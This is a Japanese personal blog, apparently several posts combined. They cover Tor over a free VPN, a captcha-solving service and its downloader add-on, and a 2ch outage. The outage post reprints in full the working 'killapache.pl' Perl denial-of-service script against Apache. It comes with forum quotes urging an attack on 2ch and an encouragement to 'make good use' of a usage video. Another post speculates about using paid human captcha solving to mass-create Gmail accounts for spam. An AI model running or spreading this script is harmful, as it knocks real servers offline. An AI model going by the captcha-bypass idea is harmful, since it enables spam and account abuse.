PHP開発者からネット環境を取り上げると...

最近、Torがマイブームでいろんなツールに適用させて遊んでます（注Torrentにはするなよ!!)

で、Torのネットワークに接続をするのに更にVPNを通らせられないかなと思い、実際にやってみました。



私が使ってる無料のVPNサービスはHotspot　Shieldです。（広告がうぜーなぁ）

//Torって何とかHotspot Shieldって何という方のために最後の方にメモしておきます

では、早速やってみることにします。

Hotspot VPNに接続後、Torに接続。。Hotspotのサイトに入ってみます。。。あれ、Sock同士でぶつかってるみたいです。

Torでは、随分前にHTTP回線時、のDNS漏洩の脆弱性を克服してますし、HTTPだけで接続してみましょう。

ブラウザのPROXYの設定で、localhost:8118に設定し（Sockはlocalhost:9050です）

いざ、接続。。。遅いのは仕方ないとして、あれHotspotのウザイ広告が消えてる！？

あとはブラウザの同時接続数の問題です。まーあOperaは同時接続数128だし。。

まあ、よーく考えてみれば当たり前ですよね。Hotspot起動中にダウンローダーなどを接続すると、VPNの名の通りやっぱりHotspot経由で接続されます。。。まあ、その時はどうやら広告は一緒についてこない様です。

HotspotVPN接続プログラムなんて感じでデータを受信するプログラム経由でやれば広告は表示されないんですね。。じゃーあ誰か作ってｗ。。いや私はPHPしかわかんないんで。。fopenとかcURLでできるわけ無いじゃないですか。。とまあ、そんな感じです。


ちなみに、Hotspot Shield経由のTor接続時の速度は以下の通りです。

52.68Kbps (6.34KB/sec)

うーん流石に酷いかな。。

//Torとは、米海軍が作った匿名ネットワークです。

仕組み、P2Pシステムを利用しデータを回線を提供しているネットワークに暗号化してから、たらい回しにします。

それで、最後復号化して、データを受信する仕組みです。

たらい回しにするため、追跡することが難しく、個人が利用するのではとても強力な匿名ネットワークですが、

日本の大使館の情報が漏洩したとおり、政府レベルで追跡しようとすればできます。とはいえ、クラッキングやファイル共有といったことまで、追跡するとは思えませんのでかなり強固な匿名ネットワークと言えるでしょう。ただ、ファイル共有を匿名でしたいと考える人が、Torを使い放題に使い、昔と比べて帯域が落ちています。最近では、たらい回しの起点部分、つまり最後、取得する鯖側にDMCA通知（「ファイルを削除しなさい」みたいなもの）を受けるなど、いろいろと問題が出ています。

//Hotspot Shieldとは

Hotspot ShieldとはHotspotとは別の会社AnchorFree Incがやっている無料のVPNサービスです。

VPNとはVirtual Private Network（仮想プライベートネットワーク）のことで様々な種類があるため詳細はwikipediaを参照してください。

昔、（今も?）日本の利用者が急増し、回線が圧迫された海外サービスなどはアクセス制限を敷いてきました。そこで、あえて安定したアメリカのプロクシを使いたいという人が多く、そんな中このサービスが注目されました。

  Virtual Private Networkの名の通り、パソコンのネットワークをすべて、HotspotShield経由で接続することにより、Hotspot Shieldに対し捜査の手が入らない限り、匿名で、更にはアメリカから接続したことになります。

とまあ、そんな感じなんだが。。まあHotspot　Shieldの説明は適当だった気がします 

captchatraderの稼ぎ方、captchatrader問題点についてBlogで書いて見たところ、結構アクセスがあったので、もしかしたら、アップローダーサイトからのダウンローダーMiponyやJDownloaderのアドオンについて知りたいんだよ。。というような人もいそうなので、Mipponyのアドオンについて説明しようと思います（つまんないとおもうんだがー）

  captchatraderの稼ぎ方、captchatrader問題点についてもぜひご覧ください  

Miponyへのアドオンの方法

設定→アドオン→更にプラグインを追加

すると、Miponyのプラグインページに飛ばされます

 


ちなみに、MiponyのアドオンはCAPTCHA TRADER以外ありません。

ダウンロードしてインストールするのですが、このプラグイン、実はxpiのような高等なものでなく、一種のアプリケーションとしてインストールします。

インストールが終わったらもう一度Miponyの設定→アドオンを開き、そこにインストールされていればOKです。

CapthaTraderの設定をクリックすると、 アカウント管理をします。

そこで、Get a Captcha Trader user and password for freeというのをクリックしてCaptchatraderのサイトに行きます。

そこで、会員登録を行い、メールの確認などを行い、ログインします。

現在、キャンペーンで１００ポイントを無料で振舞ってますから、直ぐに使うことができます。

もういかっかい、Miponyに戻り、


順にユーザー名
パスワード（登録した時のスワードでもいい）

文字認証を何回失敗したら、ダウンロードをやめるか

現在のポイント数

という感じです。

ですが、このプログラムSubmitボタンがありません。適当にテキストボックスにカーソルを入れて、Enterキーを押してあげましょう。

ちなみに、一回の文字認証につき約７ポイントです。

ポイントが足りなくなってきたら、CapchaTraderのサイトに行って、代理で文字認証してあげましょう。

二時間程度で５００ポイントは超えます。（７００ポイント位?）

頑張ってください。

 

WindowsにMetasploitインストールしたし、２ｃｈに行ってみるかと接続してみたところ。。繋がらない。。Twitterに行ってみると、学校の友達から全落ちしてることを聞き、適当に巡回していたら、避難所にて、面白いことを聞きました。

15 名前：動け動けウゴウゴ２ちゃんねる[] 投稿日：2011/08/25(木) 22:50:07.51 ID:Ndt8kIn70 [1/2]
だれかこれ2chに撃ってみて
パッチ当ててなかったら落ちると思う

.org/fulldisclosure/2011/Aug/175

47 名前：動け動けウゴウゴ２ちゃんねる[] 投稿日：2011/08/25(木) 23:24:46.26 ID:Ndt8kIn70 [2/2]
ごめんなさいraicho落としてしまいました

避難所

ほう、じゃそのkillapache.plを見てると、、、（中学の時にPerlを少しかじってたので）

killapach.pl

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl <host> [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) {
usage;
exit;
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}

いや、無理ぽ。。いやすいません。。BG20鯖から２ｃｈのDATを取得し、アーカイブ化して、MINUSなどにアップロードする分散ネットワークを試験稼働中で、

即、アメリカの無料レンタルサーバーの管理人から「止めろよコラ」というメールがきて、全部止めてきました。

ふうーこれからは、２ｃｈが落ちるということも想定したPHPアプリケーションを作んないといけないんですね。

いい勉強をさせて頂きました。w

2chを鯖落ちさせたと思われるソースコード

そのソースコードの元ネタ（注：ファイル直リンク）

追記：

このKillapachの使い方動画がYoutubeにアップロードされていました。有効利用してください



Backtrack 5いつもお世話になってます

また、Metasploitにも実装されるようです。今、丁度Metasploitを起動してる所なんですが。。うん私はそんなことはせんぞー 

metasploit （version 4)

 

captchatraderとは代理で画像認証をしてくれるというサービスです

考えついた人は随分と凄い人ですが、まだAPIは整理されていなく、現在、提供されているのはJAVAアプリケーションのみで、それを参考にMiponyやJDownloaderがアドオンを作り、現在稼働中です。

Miponyにアドオンのつけ方を書いてもつまらないので、代理の画像認証屋をやってみました。

代理で画像認証をすると、その認証スピードと正確性からクレジットというポイントがもらえます。

どうやら、クレジットは１万クレジットで１＄に換金できるようです。ｗ

私は、ローマ字入力以外のタイピングは結構遅く、頑張ってもHotfileのような画像認証では頑張って９秒かかります。だいたいそれで７クレジットもらえます。

全然もらえないと思いましたが、GetMoneyやらドル箱やらNeoBuxやらIncreaseBuxといった世界中のお小遣いサイトと比べてみれば、

間違いなく、課題の量は無限にあり、３時間もやっていたら１０００クレジットたまりました。

更には、「画像認証をしてくださいアラーム」などどもあり、私は積分の勉強をしながら出来ましたｗｗ

まあ、意外にも普通のお小遣いサイトよりはいいので需要がありそうです。

//登録をする方はこのリンクを使ってくれるとありがたいです。

だが。。（こっから本気で）

captchatraderというサイトは様々な画像認証をするので、たまに某Googleの画像認証まで流れてきました。

まあ、入力画面にSkipというボタンがあるため、入力しなければいいのですが。。

仮定の話として、Gmailを作成をしてる時にデータを入力しているのがスクリプトでは無いことを確認しているのが画像認証なのですが、もしこのサイトを利用し、大量のGoogleアカウントを作ってしまえば、GMailのアカウントを分散させて、大量の人に無差別に送りつけるスクリプトを作ったとしましょう。。

GMailでは、大量にメールを送った際に迷惑メールを送っていると勘付き規制します。しかし、分散させてしまえば、簡単に逃げ切れてしまいます。

captchatraderによってアリエナイとされていたExploit（脆弱性）ができてしまう可能性があります。

ほとんどのクラウドサービスは、画像認証とメール認証で出来てると言っても過言ではありません。

その防波堤もしくは、クラウドのファイアーウォールを破壊することができるサイトができてしまったということです。

まあ、これからどんなふうにcaptchatraderというサイトが動いていくか見どころです。

動画サイト業界とUPLOADER業界は、あえてくっつかないことによってFileの拡散は深刻ではなかった。

しかし、最近UPLOADER業界では競争が激しく、閉鎖さされるサイトも少なくない。

そのため、生き残りをかけて、様々なサービスを提供し始めた。

リワードサービスもその一つであり、UPLOADR業界独特のものだったが、ついに動画サイトにもこのようなサービスをするようなサイトが出てきた。

発端といえば、Megauploadによる、Megavideoサービスから始まったものの、現在ではRapidShareでも、動画が再生できるようなサービスがある。

Videobb videozer

のような、動画サイトが始めてしまった以上は、ニコニコ動画やYoutubeといったブランド勝負では上手く行かなくなってしまう。

これからは、金をくれる動画サイトにもMegauploadやFileFactoryといったような違法なファイルの流通するようになり、これから動画サイトへの認識も悪化するのではないだろうか。